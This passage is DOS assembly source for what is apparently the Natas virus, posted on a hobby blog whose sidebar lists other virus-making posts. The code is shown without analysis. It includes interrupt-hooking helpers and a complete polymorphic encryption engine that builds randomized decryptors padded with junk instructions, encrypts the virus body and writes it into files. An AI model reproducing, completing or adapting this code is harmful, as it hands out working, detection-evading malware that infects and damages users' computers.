mov cx,2 mov si,offset backup is_it_mod_bak: push cx di mov cl,8 lods byte ptr cs:[si] ; get 'B' or 'M' xor al,66h + 6h ; decrypt repne scasb jne is_it_mod cmp cl,3 jb is_it_mod mov cl,4 is_ode_ack: lods byte ptr cs:[si] xor al,66h + 6h jz is_it_mod ; 0 (done)? scasb loope is_ode_ack is_it_mod: mov si,offset modem pop di cx loopne is_it_mod_bak it_is_special: pop es di si cx ax retn backup: db 'B' xor (66h + 6h) db 'A' xor (66h + 6h) db 'C' xor (66h + 6h) db 'K' xor (66h + 6h) db 0 xor (66h + 6h) modem: db 'M' xor (66h + 6h) db 'O' xor (66h + 6h) db 'D' xor (66h + 6h) db 'E' xor (66h + 6h) db 'M' xor (66h + 6h) ;=====( get current PSP segment )============================================; get_psp: push ax bx mov ah,62h call call_21 ; get PSP segment dec bx mov es,bx ; MCB of current program mov di,8h ; offset of file name cld pop bx ax retn ;=====( Get DTA address )====================================================; get_dta: mov ah,2fh call call_21 ; DTA address into ES:BX push es pop ds retn call_dos_13: call swap_13 pushf call cs:dos_13 call swap_13 retn call_disk: test dl,80h ; ZF -> Floppy disk (int 40h) je call_40 call_13: pushf call cs:int_13 retn call_21_file: mov bx,0 handle = word ptr $ - 2 call_21: pushf push cs call go_2_21 retn call_40: pushf call cs:int_40 retn include eng.asm db "Natas",0 even decrypt: mov word ptr ds:[100h],1f0eh ; PUSH CS/POP DS mov byte ptr ds:[102h],0e8h ; CALL jmp file_start org decrypt + 150 header dw 18h / 2 dup(20cdh) file_end: work_header dw 18h / 2 dup(?) write_buff: db encode_end-encode dup(?) int_21_ss dw ? int_21_sp dw ? dw 256 / 2 dup(?) temp_stack: jump_code_13 db 5 dup(?) jump_code_21 db 5 dup(?) int_1 dd ? int_24 dd ? int_13 dd ? dos_13 dd ? int_15 dd ? int_40 dd ? int_21 dd ? new_24: db 3 dup(?) push_pop_ret dw ? pointer dw ? disp dw ? encode_ptr dw ? encode_enc_ptr dw ? key_reg db ? count_reg db ? ptr_reg db ? ptr_reg1 db ? modify_op db ? origin db ? inst_count db ? disk_buff db 512 dup(?) v_end: ;=====( Very useful structures )=============================================; ;=====( Memory Control Block structure )=====================================; mcb struc mcb_sig db ? ; 'Z' or 'M' mcb_owner dw ? ; attribute of owner mcb_size dw ? ; size of mcb block mcb_name db 8 dup(?) ; file name of owner mcb ends ;=====( For functions 11h and 12h )==========================================; Directory STRUC DS_Drive db ? DS_Name db 8 dup(0) DS_Ext db 3 dup(0) DS_Attr db ? DS_Reserved db 10 dup(0) DS_Time dw ? DS_Date dw ? DS_Start_Clust dw ? DS_Size dd ? Directory ENDS ;=====( for functions 4eh and 4fh )==========================================; DTA STRUC DTA_Reserved db 21 dup(0) DTA_Attr db ? DTA_Time dw ? DTA_Date dw ? DTA_Size dd ? DTA_Name db 13 dup(0) DTA ENDS Exe_Header STRUC EH_Signature dw ? ; Set to 'MZ' or 'ZM' for .exe files EH_Modulo dw ? ; remainder of file size/512 EH_Size dw ? ; file size/512 EH_Reloc dw ? ; Number of relocation items EH_Size_Header dw ? ; Size of header in paragraphs EH_Min_Mem dw ? ; Minimum paragraphs needed by file EH_Max_Mem dw ? ; Maximum paragraphs needed by file EH_SS dw ? ; Stack segment displacement EH_SP dw ? ; Stack Pointer EH_Checksum dw ? ; Checksum, not used EH_IP dw ? ; Instruction Pointer of Exe file EH_CS dw ? ; Code segment displacement of .exe eh_1st_reloc dw ? ; first relocation item eh_ovl dw ? ; overlay number Exe_Header ENDS Boot_Sector STRUC bs_Jump db 3 dup(?) bs_Oem_Name db 8 dup(?) bs_Bytes_Per_Sector dw ? bs_Sectors_Per_Cluster db ? bs_Reserved_Sectors dw ? bs_FATs db ? ; Number of FATs bs_Root_Dir_Entries dw ? ; Max number of root dir entries bs_Sectors dw ? ; number of sectors; small bs_Media db ? ; Media descriptor byte bs_Sectors_Per_FAT dw ? bs_Sectors_Per_Track dw ? bs_Heads dw ? ; number of heads bs_Hidden_Sectors dd ? bs_Huge_Sectors dd ? ; number of sectors; large bs_Drive_Number db ? bs_Reserved db ? bs_Boot_Signature db ? bs_Volume_ID dd ? bs_Volume_Label db 11 dup(?) bs_File_System_Type db 8 dup(?) Boot_Sector ENDS Partition_Table STRUC pt_Code db 1beh dup(?) ; partition table code pt_Status db ? ; 0=non-bootable 80h=bootable pt_Start_Head db ? pt_Start_Sector_Track dw ? pt_Type db ? ; 1 = DOS 12bit FAT 4 = DOS 16bit FAT pt_End_Head db ? pt_End_Sector_Track dw ? pt_Starting_Abs_Sector dd ? pt_Number_Sectors dd ? Partition_Table ENDS int_1_stack STRUC st_ip dw ? ; offset of next instruction after ; interrupt st_cs dw ? ; segment of next instruction st_flags dw ? ; flags when interrupt was called int_1_stack ENDS ;----------------------------------------------------------------------------; ; Dcb description for DOS 3+ ; ; ; ; Offset Size Description ; ; 00h WORD number of file handles referring to this file ; ; 02h WORD file open mode (see AH=3Dh) ; ; bit 15 set if this file opened via FCB ; ; 04h BYTE file attribute ; ; 05h WORD device info word (see AX=4400h) ; ; 07h DWORD pointer to device driver header if character device ; ; else pointer to DOS Drive Parameter Block (see AH=32h) ; ; 0Bh WORD starting cluster of file ; ; 0Dh WORD file time in packed format (see AX=5700h) ; ; 0Fh WORD file date in packed format (see AX=5700h) ; ; 11h DWORD file size ; ; 15h DWORD current offset in file ; ; 19h WORD relative cluster within file of last cluster accessed ; ; 1Bh WORD absolute cluster number of last cluster accessed ; ; 0000h if file never read or written??? ; ; 1Dh WORD number of sector containing directory entry ; ; 1Fh BYTE number of dir entry within sector (byte offset/32) ; ; 20h 11 BYTEs filename in FCB format (no path/period, blank-padded) ; ; 2Bh DWORD (SHARE.EXE) pointer to previous SFT sharing same file ; ; 2Fh WORD (SHARE.EXE) network machine number which opened file ; ; 31h WORD PSP segment of file's owner (see AH=26h) ; ; 33h WORD offset within SHARE.EXE code segment of ; ; sharing record (see below) 0000h = none ; ;----------------------------------------------------------------------------; dcb struc dcb_users dw ? dcb_mode dw ? dcb_attr db ? dcb_dev_attr dw ? dcb_drv_addr dd ? dcb_1st_clst dw ? dcb_time dw ? dcb_date dw ? dcb_size dd ? dcb_pos dd ? dcb_last_clst dw ? dcb_current_clst dw ? dcb_dir_sec dw ? dcb_dir_entry db ? dcb_name db 8 dup(?) dcb_ext db 3 dup(?) dcb_useless1 dw ? dcb_useless2 dw ? dcb_useless3 dw ? dcb_psp_seg dw ? dcb_useless4 dw ? dcb ends bpb STRUC bpb_Bytes_Per_Sec dw ? bpb_Sec_Per_Clust db ? bpb_Reserved_Sectors dw ? bpb_FATs db ? ; Number of FATs bpb_Root_Dir_Entries dw ? ; Max number of root dir entries bpb_Sectors dw ? ; number of sectors; small bpb_Media db ? ; Media descriptor byte bpb_Sectors_Per_FAT dw ? bpb_Sectors_Per_Track dw ? bpb_Heads dw ? ; number of heads bpb_Hidden_Sectors dd ? bpb_Huge_Sectors dd ? ; number of sectors; large bpb_Drive_Number db ? bpb_Reserved db ? bpb_Boot_Signature db ? bpb_Volume_ID dd ? bpb_Volume_Label db 11 dup(?) bpb_File_System_Type db 8 dup(?) bpb ENDS register struc reg_es dw ? reg_ds dw ? reg_di dw ? reg_si dw ? reg_bp dw ? reg_dx dw ? reg_cx dw ? reg_bx dw ? reg_ax dw ? reg_f dw ? register ends sys_file struc sys_next dd ? sys_strat dw ? sys_int dw ? sys_file ends end -----------------------------<>--------------------------------------- _ax equ 0 _cx equ 1 _dx equ 2 _bx equ 3 _sp equ 4 _bp equ 5 _si equ 6 _di equ 7 engine: mov ds:pointer,ax ; save IP mov di,offset decrypt mov bx,offset make_count mov cx,offset make_key mov dx,offset make_ptr mov si,offset order_ret or bp,11101111b ; SP is used call order ; randomize and call registers push di ; save start of loop push di mov si,offset encode mov di,offset write_buff mov cx,encode_end-encode rep movsb ; copy write code mov ds:encode_ptr,offset (encode_break-encode)+write_buff pop di mov bx,offset make_enc mov cx,offset make_keychange mov dx,offset make_deccount mov si,offset make_incptr call order ; call routines ;=====( Preform loop )=======================================================; mov ax,2 push ax call random ; test BP for 4000? pop ax jz loop_no_test test bp,4000h ; possible to just "Jcc"? jnz loop_make_jcc loop_no_test: call random jz loop_no_test1 test bp,2000h ; use loop? jnz loop_make_jcc loop_no_test1: or bp,800h ; do not change flags mov ax,2 cwd call random ; try OR/AND/TEST reg,reg ; or XOR/ADD/OR/SUB reg,0? mov al,ds:count_reg ; get counter jnz loop_orandtest call boolean ; do XOR/OR/ADD or ADD/SUB? jnz loop_modify call add_reg ; ADD/SUB reg,0 jmp loop_make_jcc loop_modify: call modify_reg ; XOR/OR/ADD reg,0 jmp loop_make_jcc loop_orandtest: mov cl,3 mov ch,al shl ch,cl or al,ch ; set reg1 as reg2 also mov bx,2 ; OR/AND/TEST call random_bx jnz loop_and or ax,9c0h ; OR reg1, reg2 loop_reverse: call boolean ; use 9 or 11? jnz loop_orandteststo or ah,2h ; reg2, reg1 jmp loop_orandteststo loop_and: dec bx jnz loop_test or ax,21c0h ; AND reg1, reg2 jmp loop_reverse loop_test: or ax,85c0h ; TEST reg1, reg2 loop_orandteststo: xchg al,ah stosw ; store TEST/OR/AND or bp,1800h ; do not change flags/ ; test stored call garble loop_make_jcc: and bp,not 800h test bp,2000h ; code loop? jz loop_make_jump mov al,0e2h ; LOOP test bp,1000h ; possible to use LOOPNZ/Z? jz loop_code_disp call boolean jnz loop_code_disp dec ax ; LOOPZ call boolean jnz loop_iscx dec ax ; LOOPNZ jmp loop_code_disp ;=====( Now make conditional jump )==========================================; jcc_tbl: db 75h,79h,7dh,7fh ; JNE/JNS/JG/JGE loop_make_jump: mov bx,offset jcc_tbl mov ax,3 call random xlat ; get Conditional jump mov bx,2 call random_bx ; use JE/JS/LE/L then JMP? jnz loop_code_disp cmp ds:count_reg,_cx ; CX is counter? jnz loop_notcx mov bl,4 call random_bx jnz loop_notcx mov al,0e3h + 1 ; JCXZ + 1 loop_notcx: dec ax loop_iscx: stosw cmp al,07fh ; Jcxz/loopz? ja loop_code_short call boolean ; Use opposite or EB? jnz loop_code_short or bp,800h ; dont change flags loop_code_short:mov si,di ; save offset of displacement call garble lea ax,ds:[si-2] sub ax,di neg al ; get jump displacement mov ds:[si-1],al ; save it test bp,800h ; Dont change flags -> "Jcc" mov al,0ebh ; Jmp short je loop_code_disp mov ax,3 call random mov bx,offset jcc_tbl xlat ; Get JNE/JNS/JG/JGE loop_code_disp: stosb ; store jump pop ax ; start of loop dec ax sub ax,di ; get loop displacement stosb or bp,11101111b ; free all registers and bp,not 800h ; allow flags to change call garble mov ax,19 call random ; 1 in 20 chance of non-jmp jnz loop_code_jmp mov ax,ds:pointer add ax,offset file_start ; where to jump xchg dx,ax call get_reg ; get a register call mov_reg ; Mov value into register or ax,0ffc0h + (4 shl 3) ; JMP reg16 call boolean ; PUSH/RET or JMP reg16? jnz loop_code_push xchg al,ah jmp loop_code_stosw loop_code_push: mov bx,2 call random_bx ; 1 in 3 chance of FF /6 PUSH jnz loop_code_push1 xor al,(6 shl 3) xor (4 shl 3) ; PUSH reg xchg al,ah stosw jmp loop_code_ret loop_code_push1:xor al,50h xor (0c0h or (4 shl 3)) ; PUSH reg stosb loop_code_ret: call garble mov al,0c3h ; RETN stosb jmp loop_code_end loop_code_jmp: mov al,0e9h stosb ; Store Jump lea ax,ds:[di-((file_start-2)-v_start)] neg ax ; Jmp file_start loop_code_stosw:stosw loop_code_end: mov si,ds:encode_enc_ptr ; get encrypt instruction ptr cmp di,offset header ; Decryptor is too large? jb go_write_buff stc ; return error pushf pop bp retn go_write_buff: jmp write_buff ; encrypt/write/decrypt ;=====( Inc pointer )========================================================; make_incptr: mov ax,word ptr ds:ptr_reg ; get pointer registers mov dx,2 ; ADD ptr,2 cmp ah,-1 ; two registers used? jz make_incptr_1 call boolean ; do one or both? jnz make_incptr_do1 dec dx ; ADD ptr,1 call make_incptr_do1 jmp make_incptr_2 make_incptr_do1:call boolean jnz make_incptr_1 make_incptr_2: xchg al,ah make_incptr_1: call add_reg sub ds:disp,dx ; add to displacement retn ;=====( Dec counter )========================================================; make_deccount: cmp si,offset make_deccount ; last operation? jnz make_deccount_notlast call boolean ; do it? jnz make_deccount_notlast or bp,4800h ; remember we're last make_deccount_notlast: mov al,ds:count_reg cmp al,_cx ; possible to use LOOP/LOOPNZ? jnz make_deccount_notcx call boolean jnz make_deccount_notcx or bp,2000h ; do LOOP jmp make_deccount_exit make_deccount_notcx: mov dx,-1 ; ADD counter,-1 call add_reg make_deccount_exit: or bp,400h ; deccount executed retn ;=====( Make encryption instruction )========================================; make_enc: push bp and bp,not 400h mov al,ds:key_reg push ax ; save key register make_enc_which: mov ax,4 ; ADD/SUB/XOR/ROR/ROL call random mov bx,0105h ; ADD [DI],AX mov cx,1119h ; ADC/SBB mov dx,2905h ; SUB [DI],AX jz make_enc_add dec ax jz make_enc_sub dec ax jnz make_enc_ror mov bh,31h ; XOR mov dx,3105h ; XOR [DI],AX jmp make_enc_sto make_enc_ror: cmp ds:key_reg,_cx ; CX is key? jne make_enc_which or bp,400h ; Put XCHG CX,AX mov bh,0d3h mov dx,0d30dh ; ROL dec ax jz r_make_enc_sto xchg bx,dx ; ROR r_make_enc_sto: mov ds:key_reg,al ; 1 SHL 3 = 08 / D3 08 ; D3 00 = ROL [],CL jmp make_enc_sto make_enc_sub: xchg dh,bh ; SUB - ADD [DI],AX xchg cl,ch ; SBB/ADC make_enc_add: call boolean ; do Carry? jnz make_enc_sto push bx mov bh,ch ; Make it ADC/SBB call clear_carry cmp al,0 org $ - 1 make_enc_sto: push bx test bp,8000h ; EXE file? jz make_enc_com call is_bp_ptr ; is BP a pointer? je make_enc_com mov al,2eh ; CS: call boolean jnz make_enc_cs mov al,36h ; SS: make_enc_cs: stosb ; store segment override make_enc_com: mov al,bh stosb ; store instruction mov ax,word ptr ds:ptr_reg ; get pointer registers cmp ah,-1 ; second reg? je make_enc_xlat add al,ah make_enc_xlat: mov bx,offset rm_tbl xlat ; get r/m call is_bp_ptr ; is BP a pointer? jnz make_enc_nobp inc ah ; is there a second reg? jne make_enc_nobp or al,01000000b ; [BP+xx] make_enc_nobp: mov cx,ds:disp ; get displacement mov bx,6 call random_bx ; allow no displacement? jz make_enc_get_disp jcxz make_enc_sto_rm make_enc_get_disp: or al,01000000b ; 8bit displacement call boolean ; allow 8bit displacement? jnz make_enc_16bit cmp cx,7fh ; 8bit displacement? jbe make_enc_sto_rm cmp cx,-80h jb make_enc_16bit xor ch,ch cmp ax,0 org $ - 2 make_enc_16bit: xor al,11000000b ; 8bit off, 16bit on make_enc_sto_rm:mov ah,ds:key_reg shl ah,1 shl ah,1 shl ah,1 ; from bits 0-2 of AH or al,ah ; to bits 3-5 of AL stosb ; store r/m byte test al,11000000b ; any displacement? jz make_enc_disp test al,10000000b ; 16bit displacement? xchg cx,ax stosw ; store displacement jnz make_enc_disp dec di ; 8bit only make_enc_disp: xchg di,ds:encode_ptr ; get encode ptr test bp,400h ; store XCHG CX,AX? je make_enc_nor mov al,91h ; XCHG CX,AX stosb make_enc_nor: xchg dx,ax xchg al,ah mov ds:encode_enc_ptr,di ; save instruction pointer stosw ; set encryption instruction je make_enc_nor1 mov al,91h ; XCHG CX,AX stosb make_enc_nor1: xchg di,ds:encode_ptr ; restore decrypt ptr pop ax xchg al,ah mov word ptr ds:write_buff[encode_flip-encode],ax ; save opposite operation pop ax mov ds:key_reg,al ; restore key register pop bp retn rm_tbl: db -1,-1,-1,7,-1,6,4,5,-1,0,1,2,3 ; -1's not used ;=====( Change key )=========================================================; make_keychange: call boolean ; change key? jnz make_keychange_yes retn make_keychange_yes: push bp or bp,200h ; let know that keychange mov ax,3 call random ; 1 in 4 chance of modify_reg jnz keychange_other call random_1 xchg dx,ax ; Random value to modify key ; reg by mov al,ds:key_reg call modify_reg ; XOR/ADD/OR keychange_stoop:xchg di,ds:encode_ptr ; get ptr to encode inc di ; CLC mov al,ds:modify_op ; get operation stosb keychange_stodx:xchg dx,ax ; store value/operation keychange_sto: stosw xchg di,ds:encode_ptr ; get decrypt pointer pop bp retn keychange_other:mov al,4 ; ROR/ROL/NOT/NEG/ADD call random jnz keychange_rol mov ax,0d1c0h ; ROR AX,1 keychange_cl: mov bx,2 ; 1 in 3 chance of ,CL call random_bx jnz keychange_nocl cmp ds:count_reg,_cx ; Count is CX? jne keychange_nocl test bp,400h ; Count already decremented? jnz keychange_nocl or ah,2 ; By CL keychange_nocl: xchg al,ah push ax or ah,ds:key_reg ; set key register stosw ; store instruction pop ax xchg di,ds:encode_ptr ; get encode ptr jmp keychange_sto keychange_rol: dec ax jnz keychange_not mov ax,0d1c0h or (1 shl 3) ; ROL AX,1 jmp keychange_cl keychange_not: dec ax jnz keychange_neg mov ax,0f7c0h + (2 shl 3) ; NOT AX jmp keychange_nocl keychange_neg: dec ax jnz keychange_add mov ax,0f7c0h + (3 shl 3) ; NEG AX jmp keychange_nocl keychange_add: call random_1 xchg dx,ax mov al,ds:key_reg ; get key register call add_reg ; ADD reg(ax), value(dx) jmp keychange_stoop ;=====( Build key )==========================================================; make_key: call get_reg ; get register xchg dx,ax call random_1 ; get key mov ds:key,ax ; save key xchg dx,ax mov ds:key_reg,al ; save register call mov_reg ; MOV reg(ax),value(dx) retn ;=====( Build counter )======================================================; make_count: call get_reg ; get register mov ds:count_reg,al ; save register mov dx,(decrypt-v_start)/2 ; # of words to crypt call mov_reg ; mov reg(ax),value(dx) retn ;=====( Build Pointer )======================================================; make_ptr: mov dx,ds:pointer call get_ptr_reg ; get DI/SI/BP/BX mov ds:ptr_reg,al mov ds:ptr_reg1,-1 mov bx,3 call random_bx ; 1 in 4 chance of 2 regs jnz make_ptr_2 cmp al,_si mov bx,11000000b ; DI/SI jb make_ptr_test mov bl,00101000b ; BP/BX make_ptr_test: test bp,bx ; 'other' availible? jz make_ptr_2 make_ptr_again: call get_ptr_reg ; get DI/SI/BP/BX push ax call conv_num ; convert to bit-map number test al,bl ; is it other type? pop ax jnz make_ptr_ok call del_reg ; delete register jmp make_ptr_again make_ptr_ok: mov ds:ptr_reg1,al ; save second register mov bx,-1 call random_bx sub dx,bx ; randomize values xchg bx,dx call mov_reg ; mov reg(ax), value(dx) xchg bx,dx mov al,ds:ptr_reg ; get first reg make_ptr_2: xor bx,bx ; zero displacement call boolean ; use one? jnz make_ptr_nodisp mov bx,-1 call random_bx sub dx,bx ; subtract displacement make_ptr_nodisp:mov ds:disp,bx ; save displacement call mov_reg ; mov reg(ax), value(dx) retn ;=====( Shell for mov_reg1 )=================================================; mov_reg: push bx dx mov bx,4 call random_bx ; 1 in 5 chance of MOV/ADD/SUB jnz mov_reg_call mov bx,-1 call random_bx ; get random # sub dx,bx ; MOV reg, value-random # call mov_reg1 ; do MOV reg, mov dx,bx call add_reg ; Now add difference pop dx bx retn mov_reg_call: pop dx bx ;=====( Mov reg(ax), value(dx) )=============================================; mov_reg1: push ax bx cx dx cbw mov bx,2 call random_bx ; MOV or SUB/XOR ADD/OR/XOR jz mov_reg_other mov bl,2 call random_bx ; 1 in 3 chance of c6/c7 MOV jnz mov_reg_b0 or ax,0c7c0h ; MOV reg,imm call boolean ; Do long MOV or LEA? jnz mov_reg_c7 mov cl,3 shl al,cl ; Reg -> bits 3,4,5 xor ax,(8d00h or 110b) xor 0c700h ; LEA reg,[imm] mov_reg_c7: xchg al,ah stosw ; store it mov_reg_sto: xchg dx,ax stosw ; store value call garble mov_reg_exit: jmp modify_pop mov_reg_b0: or al,0b8h ; MOV reg,imm stosb jmp mov_reg_sto mov_reg_other: push ax mov cl,3 mov ch,al shl ch,cl ; copy reg1 to reg2 or al,ch ; set it call boolean jnz mov_reg_other1 or ah,2 ; reg1, reg2 -> reg2, reg1 mov_reg_other1: call boolean jnz mov_reg_xor or ax,29c0h ; SUB reg, reg call boolean jnz mov_reg_other_sto xor ah,19h xor 29h ; SBB reg, reg call clear_carry ; clear carry flag mov_reg_other_sto: xchg al,ah stosw call garble pop ax call modify_reg ; ADD/OR/XOR reg(ax),value(dx) jmp mov_reg_exit mov_reg_xor: or ax,31c0h ; XOR AX,AX jmp mov_reg_other_sto ;=====( ADD/OR/XOR reg(ax), value(dx) )======================================; modify_reg: push ax bx cx dx cbw mov bx,2 call random_bx mov cx,3500h + (6 shl 3) ; XOR jz modify_reg_cont mov cx,0d00h + (1 shl 3) ; OR dec bx jz modify_reg_cont modify_reg_add: mov cx,0500h ; ADD call boolean ; ADC or ADD? jnz modify_reg_cont mov cx,1500h + (2 shl 3) ; ADC modify_reg_clc: call clear_carry ; Clear carry flag modify_reg_cont:test bp,200h ; keychange executing? jz modify_reg_nosave mov ds:modify_op,ch ; save AX operation modify_reg_nosave: call boolean ; check if AX? jnz modify_reg_noax or al,al ; AX? jnz modify_reg_noax mov al,ch stosb ; store instruction xchg dx,ax modify_sto: stosw ; store value modify_exit: call garble modify_pop: pop dx cx bx ax retn modify_reg_noax:or ax,81c0h or al,cl ; XOR/OR/ADD call boolean ; sign extend? jnz modify_reg_nosign cmp dx,7fh ; possible to sign extend? jbe modify_sign cmp dx,-80h jb modify_reg_nosign modify_sign: or ah,2 ; sign extend modify_reg_nosign: xchg al,ah stosw test al,2 ; sign extended? xchg dx,ax je modify_sto stosb jmp modify_exit ;=====( ADD reg(ax), value(dx) )=============================================; add_reg: push ax bx cx dx cbw mov cx,dx add_loop: mov bx,3 call random_bx ; 1 in 4 chance of ADD/SUB jz add_noinc mov bx,40c0h ; INC reg test bp,200h ; keychange running? jz add_nosave mov ds:modify_op,05h ; ADD AX, add_nosave: cmp cx,3h ; too high to INC? jb add_inc neg cx cmp cx,3h ; too low to DEC? ja add_noinc mov bx,48c0h + (1 shl 3) ; DEC reg test bp,200h jz sub_nosave mov ds:modify_op,2dh ; SUB AX, sub_nosave: inc dx inc cx cmp ax,0 org $ - 2 add_inc: dec dx dec cx push ax mov ax,5 call random ; 1 in 6 chance of FF pop ax push ax jnz add_inc_40 mov ah,0ffh xchg bl,bh xchg al,ah ; AL=ff AH=Reg stosb xchg al,ah add_inc_40: or al,bh ; set DEC/INC stosb pop ax call garble or dx,dx ; all done? jnz add_loop add_reg_exit: jmp modify_pop add_noinc: call boolean ; ADD or SUB? jz sub_reg jmp modify_reg_add sub_reg: test bp,200h ; keychange? jnz sub_reg_key neg dx sub_reg_key: mov cx,2d00h + (5 shl 3) ; SUB call boolean ; use SBB? jz sbb_reg jmp modify_reg_cont sbb_reg: mov cx,1d00h + (3 shl 3) ; SBB jmp modify_reg_clc ;=====( clear carry flag )===================================================; clear_carry: push ax bp or bp,800h ; don't change flags mov al,0f8h ; CLC call boolean jnz clear_carry_clc mov ax,0f5f9h ; STC/CMC stosb call garble xchg al,ah clear_carry_clc:stosb call garble pop bp ax retn garble: push ax mov ax,2 call random ; how many times to call? xchg cx,ax jcxz garble_exit garble_loop: call garble1 loop garble_loop garble_exit: xchg cx,ax pop ax retn ;=====( add garbage code )===================================================; garble1: push ax bx cx dx bp test bp,100h ; Garble already executing? jnz garble_ret and bp,not 200h ; keychange not executing or bp,100h ; Garble executing call boolean jnz garble_ret mov cl,3 call random_1 xchg dx,ax ; DX=random number call get_reg ; get register jc garble_ret mov bx,6 test bp,800h ; flag change allowed? jz garble_f mov bl,2 garble_f: call random_bx ; MOV/1BYTE/XCHG/MODIFY/ADD/MOV? jnz garble_xchg or ah,89h garble_reg_set: call boolean ; reg1, reg2 or reg2, reg1? jz garble_reg_reg or ah,2 ; 8b xchg al,dl garble_reg_reg: and dl,7 ; Get register values only and al,7 shl dl,cl or al,0c0h ; MOV reg1, random reg or al,dl xchg al,ah stosw garble_ret: pop bp jmp modify_pop garble_xchg: dec bx jnz garble_1byte xchg dx,ax call get_reg ; get another reg jc garble_ret xchg dx,ax ; AL=reg1 DL=reg2 call boolean jnz garble_xchgnoax or dl,dl ; AX? jz garble_xchgax or al,al jz garble_xchgax garble_xchgnoax:or ah,87h ; XCHG reg1, jmp garble_reg_reg garble_xchgax: or al,90h or al,dl ; XCHG AX, reg garble_stosb: stosb jmp garble_ret garble_1byte: dec bx jnz garble_modify mov al,4 call random mov bx,offset garble_1byte_tbl xlat ; get 1 byte instruction jmp garble_stosb garble_modify: dec bx jnz garble_add call modify_reg ; ADD/XOR/OR reg1, random # jmp garble_ret garble_add: dec bx jnz garble_mov call add_reg ; ADD/SUB reg1, random # jmp garble_ret garble_mov: dec bx jnz garble_op call mov_reg ; MOV reg1, random # jmp garble_ret garble_op: and dh,00111000b ; get rnd op mov ah,1 or ah,dh jmp garble_reg_set garble_1byte_tbl: db 2eh db 36h cld std sti ;=====( Is BP a Pointer? )===================================================; is_bp_ptr: cmp ds:ptr_reg,_bp je bp_is_ptr cmp ds:ptr_reg1,_bp bp_is_ptr: retn ;=====( Get pointer register (DI/SI/BP/BX) )=================================; get_ptr_regnext:call del_reg ; restore register to pool get_ptr_reg: call get_reg ; get register cmp al,_bx je got_ptr_reg cmp al,_bp jb get_ptr_regnext got_ptr_reg: retn ;=====( return random register in AL )=======================================; get_reg: test bp,11101111b ; any registers free? stc jz get_reg_exit get_reg_loop: mov ax,7 call random push ax cbw call conv_num ; convert to bit map test bp,ax ; is register free? pushf not ax and bp,ax ; mark register popf pop ax jz get_reg_loop get_reg_exit: retn ;=====( Restore register to pool )===========================================; del_reg: push ax cbw call conv_num ; convert to bit number or bp,ax ; restore register pop ax retn ;=====( convert number to bit map )==========================================; conv_num: push cx mov cl,al mov al,1 shl al,cl pop cx retn ;=====( randomize order of BX/CX/DX/SI, then call )==========================; order: call garble mov ax,2 call random xchg cx,ax inc cx order_loop: call boolean jnz order1 xchg bx,ax order1: call boolean jnz order2 xchg dx,ax order2: call boolean jnz order3 xchg si,ax order3: loop order_loop push si dx bx ax order_ret: retn ;=====( return random number between 0 and ffff in bx )======================; random_bx: xchg bx,ax call random xchg bx,ax retn ;=====( flip Sign bit )======================================================; boolean: push ax mov ax,1 call random pop ax retn ;=====( return random number between 0 and ffff )============================; random_1: mov ax,-1 ;=====( Generate random number between 0 and AX )============================; random: push ds bx cx dx ax xor ax,ax int 1ah push cs pop ds in al,40h xchg cx,ax xchg dx,ax mov bx,offset ran_num xor ds:[bx],ax rol word ptr ds:[bx],cl xor cx,ds:[bx] rol ax,cl xor dx,ds:[bx] ror dx,cl xor ax,dx imul dx xor ax,dx xor ds:[bx],ax pop cx xor dx,dx inc cx je random_ret div cx xchg ax,dx random_ret: pop dx cx bx ds or ax,ax retn ran_num dw ? ;=====( Encrypts the code/writes it/decrypts code )==========================; encode: mov bx,ds:handle mov ax,0 key = word ptr $ - 2 mov cx,(decrypt-v_start)/2 xor di,di encode_break: clc clc clc clc ; XCHG CX,AX XCHG CX,AX clc clc ; CLC ADD AX,xxxx / XOR [DI],AX clc clc ; XOR [DI],AX / CLC ADD AX,xxxx inc di inc di loop encode_break encode_ret = byte ptr $ mov ah,40h mov cx,file_size cwd pushf call cs:int_21 jc encode_flag sub ax,cx encode_flag: pushf pop bp mov word ptr ds:[si],0 encode_flip = word ptr $ - 2 mov byte ptr ds:write_buff[encode_ret-encode],0c3h jmp encode encode_end:

Total Pageviews

Radha Cover Song - Swoopna Suman ft. Abhigya

Blog Archive

Pages

Visitor Time

Wednesday, September 7, 2011

Top Secrete Code of Nokia Phones

Wednesday, August 17, 2011

SHOW THE FUNNY BLUE SCREEN OF DEATH

Making a matrix virus (dangerous virus )

Friday, May 6, 2011

- SUB-ZERO VIRUS -

HOW TO MODIFY A VIRUS

VIRUS SPOTLIGHT

Software Development

Wednesday, March 2, 2011

The latest virus

Natas Virus

DMCA

Nepali time

Social

Recent

Popular

Kingdom Web's

Live Traffic feed!

Kingdom Web's

Archive

Contact Form